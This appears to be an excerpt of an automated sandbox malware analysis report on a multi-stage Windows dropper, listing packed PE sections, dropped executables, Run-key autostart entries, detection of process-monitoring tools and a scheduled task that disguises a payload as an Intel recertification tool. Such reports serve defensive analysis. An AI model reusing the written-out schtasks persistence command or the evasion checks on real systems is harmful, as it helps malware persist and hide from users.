Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: vpedfbia
Source: random[1].exe1.5.dr	Static PE information: section name: fsmwrfhy
Source: random[1].exe1.5.dr	Static PE information: section name: .taggant
Source: c3fed0b086.exe.5.dr	Static PE information: section name:
Source: c3fed0b086.exe.5.dr	Static PE information: section name: .idata
Source: c3fed0b086.exe.5.dr	Static PE information: section name: doyjdknv
Source: c3fed0b086.exe.5.dr	Static PE information: section name: vjvesdaf
Source: c3fed0b086.exe.5.dr	Static PE information: section name: .taggant
Source: e66237da20.exe.5.dr	Static PE information: section name:
Source: e66237da20.exe.5.dr	Static PE information: section name: .idata
Source: e66237da20.exe.5.dr	Static PE information: section name:
Source: e66237da20.exe.5.dr	Static PE information: section name: vpedfbia
Source: e66237da20.exe.5.dr	Static PE information: section name: fsmwrfhy
Source: e66237da20.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: .idata
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: cllxmxcj
Source: random[2].exe2.5.dr	Static PE information: section name: xpgytcmm
Source: random[2].exe2.5.dr	Static PE information: section name: .taggant
Source: 318ea9f50d.exe.5.dr	Static PE information: section name:
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: .idata
Source: 318ea9f50d.exe.5.dr	Static PE information: section name:
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: cllxmxcj
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: xpgytcmm
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: .taggant
Source: in.exe.18.dr	Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.20.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009ED91C push ecx; ret	0_2_009ED92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E1359 push es; ret	0_2_009E135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0074D91C push ecx; ret	2_2_0074D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0074D91C push ecx; ret	5_2_0074D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_0074DFC6 push ecx; ret	5_2_0074DFD9
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F8A01 push edi; iretd	6_1_001F8A02
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001FA63D push ecx; mov dword ptr [esp], esi	6_1_001FA657
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001FA63D push 5F427E0Ah; mov dword ptr [esp], esi	6_1_001FE017
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_002136B9 push esi; mov dword ptr [esp], ebx	6_1_0021370A
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_002136B9 push 074D8900h; mov dword ptr [esp], edx	6_1_00213817
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_002136B9 push 6FEDD251h; mov dword ptr [esp], ebp	6_1_00213832
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001FB4A1 push 18126B76h; mov dword ptr [esp], edi	6_1_001FB4BC
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_0025A4F3 push ecx; mov dword ptr [esp], eax	6_1_0025A527
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_0025A4F3 push ecx; mov dword ptr [esp], 63FA83E8h	6_1_0025A680
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_0025A4F3 push 19006F7Dh; mov dword ptr [esp], ebx	6_1_0025A6AB
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735 push 7620B96Eh; mov dword ptr [esp], eax	6_1_002857C6
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735 push edi; mov dword ptr [esp], ebx	6_1_00285908
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735 push ebp; mov dword ptr [esp], edi	6_1_0028598D
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735 push ebp; mov dword ptr [esp], eax	6_1_00285A02
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00285735 push 384EAFF2h; mov dword ptr [esp], eax	6_1_00285A61
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00253509 push edx; mov dword ptr [esp], ecx	6_1_00253569
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00253509 push edi; mov dword ptr [esp], 7513CFF9h	6_1_002535D8
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_00253509 push 45062EC2h; mov dword ptr [esp], ecx	6_1_002535EE
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F5D50 push 360BA69Bh; mov dword ptr [esp], esi	6_1_001F5CFF
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F6DBA push eax; mov dword ptr [esp], edx	6_1_001F6E32
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F6DBA push ecx; mov dword ptr [esp], edi	6_1_001F6E46
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F6DBA push eax; mov dword ptr [esp], FB392922h	6_1_001F6E52
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F6DBA push edi; mov dword ptr [esp], esi	6_1_001F6FFC
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F5FB1 push edx; mov dword ptr [esp], esp	6_1_001F5FD3
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F9FA1 push 18126B76h; mov dword ptr [esp], edi	6_1_001FB4BC
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Code function: 6_1_001F61D9 push ebp; ret	6_1_001F61DA

Source: file.exe	Static PE information: section name: entropy: 7.980708133765683
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.980708133765683
Source: random[1].exe.5.dr	Static PE information: section name: entropy: 7.964759279856404
Source: random[1].exe.5.dr	Static PE information: section name: fsrfimey entropy: 7.953315584919624
Source: 53f7160658.exe.5.dr	Static PE information: section name: entropy: 7.964759279856404
Source: 53f7160658.exe.5.dr	Static PE information: section name: fsrfimey entropy: 7.953315584919624
Source: random[1].exe0.5.dr	Static PE information: section name: gmgvfxzz entropy: 7.9556136093103
Source: 53fe16f582.exe.5.dr	Static PE information: section name: gmgvfxzz entropy: 7.9556136093103
Source: random[2].exe.5.dr	Static PE information: section name: entropy: 7.986083090238459
Source: random[2].exe.5.dr	Static PE information: section name: sqzmxkkd entropy: 7.95254409211984
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: entropy: 7.986083090238459
Source: a98b6b83c7.exe.5.dr	Static PE information: section name: sqzmxkkd entropy: 7.95254409211984
Source: random[1].exe1.5.dr	Static PE information: section name: entropy: 7.979453481461785
Source: random[1].exe1.5.dr	Static PE information: section name: vpedfbia entropy: 7.952940751916607
Source: e66237da20.exe.5.dr	Static PE information: section name: entropy: 7.979453481461785
Source: e66237da20.exe.5.dr	Static PE information: section name: vpedfbia entropy: 7.952940751916607
Source: random[2].exe2.5.dr	Static PE information: section name: entropy: 7.783553848123094
Source: random[2].exe2.5.dr	Static PE information: section name: cllxmxcj entropy: 7.903007723485867
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: entropy: 7.783553848123094
Source: 318ea9f50d.exe.5.dr	Static PE information: section name: cllxmxcj entropy: 7.903007723485867

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016495001\3f0b27a17c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016496001\318ea9f50d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016494001\c3fed0b086.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c3fed0b086.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a98b6b83c7.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016491001\53f7160658.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016492001\53fe16f582.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016493001\a98b6b83c7.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a98b6b83c7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a98b6b83c7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c3fed0b086.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c3fed0b086.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016490001\b3712f1a7c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
